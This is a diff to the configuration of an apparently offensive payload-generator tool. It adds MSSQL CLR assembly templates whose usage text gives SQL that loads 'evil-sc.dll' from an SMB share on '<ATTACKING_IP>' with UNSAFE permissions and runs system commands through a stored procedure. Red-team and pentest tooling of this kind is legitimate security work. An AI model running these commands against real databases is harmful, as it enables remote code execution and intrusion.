--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -105,6 +105,20 @@ custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microso
 expected_format = RAW_BIN
 output_format = .exe
 
+[windows_cs:MssqlCmd.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.Data
+custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_assembly FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \n"CREATE PROCEDURE [dbo].[CustSQLCmd] @cmd NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[CustSQLCmd]; \nCustSQLCmd 'whoami'  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
+
+[windows_cs:MssqlRunner.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.Data
+custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_run FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \nCREATE PROCEDURE [dbo].[CustSQLRunner] AS EXTERNAL NAME [my_run].[StoredProcedures].[CustSQLRunner]; \nCustSQLRunner  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
+
+
+
 [windows_js:VenomaToJs]
 expected_format = RAW_BIN
 output_format = .js
